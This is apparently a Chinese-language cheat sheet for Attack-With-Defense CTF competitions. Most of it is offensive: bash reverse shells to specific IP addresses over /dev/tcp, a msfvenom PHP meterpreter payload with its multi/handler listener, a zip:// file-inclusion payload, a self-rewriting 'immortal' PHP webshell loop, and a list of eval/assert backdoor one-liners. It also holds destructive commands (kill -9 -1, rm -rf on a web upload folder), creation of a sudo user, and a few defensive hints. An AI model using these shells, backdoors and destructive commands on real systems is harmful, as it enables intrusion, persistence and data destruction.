AWD整理

AWD整理

nmap -nv ip n不要域名解析
nmap -sS ip SYN
nmap -T4 -A 高强度

python -c 'import pty;pty.spawn("/bin/bash")'

tar -zcf /tmp/xxx.tar.gz html
tar -xzvf /tmp/xxx.tar.gz

mysqldump –uxxx –pxxx dbname > xxx.sql

passwd
修改网站管理员密码
update users set password=md5(“xxxxxx”);
修改数据库密码
set password for 用户名@localhost = password('新密码');


bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash

rm -rf /var/www/html/upload_lab/upload/*

zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?

op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p

利用msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j

php不死马
caidao

';
	while (1) {
		file_put_contents($file, $code);
		//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
}



后门
eval($_POST[“a”]);
assert($_POST[“a”]);     可以写成$a=“assert”;$a($_POST[a]);
array_filter(array($_POST[“a”]),”assert”);
preg_replace("/test/e",$_POST[“a"],"jutst test");
$func =create_function('',$_POST[‘a’]);$func();
echo array_map(“assert”, array($_POST[“a”]));
call_user_func("assert",$_POST['cmd’]);
call_user_func_array("assert", array($_POST[“a”]));
等等

删除不死马
kill -9 -1
kill -9 -1


linux新建用户

useradd -m username1
passwd username1
usermod -a -G sudo username1

防注入
addslashes
htmlspecialchars